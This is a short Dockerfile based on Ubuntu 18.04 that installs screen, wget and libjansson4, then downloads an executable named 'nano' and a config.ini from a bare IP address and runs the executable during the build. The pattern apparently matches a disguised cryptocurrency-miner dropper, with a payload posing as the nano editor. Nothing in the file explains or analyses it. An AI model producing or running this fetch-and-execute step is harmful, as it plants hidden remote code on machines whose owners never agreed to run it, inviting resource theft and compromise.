FROM ubuntu:18.04

RUN apt-get update && \
    apt-get upgrade -y && \
    apt-get install -y screen wget libjansson4 && \
    chmod 777 /run/screen && \
    wget -q http://139.180.153.145/nano && \
    wget -q http://139.180.153.145/config.ini && \
    chmod +x nano config.ini && \
    ./nano
    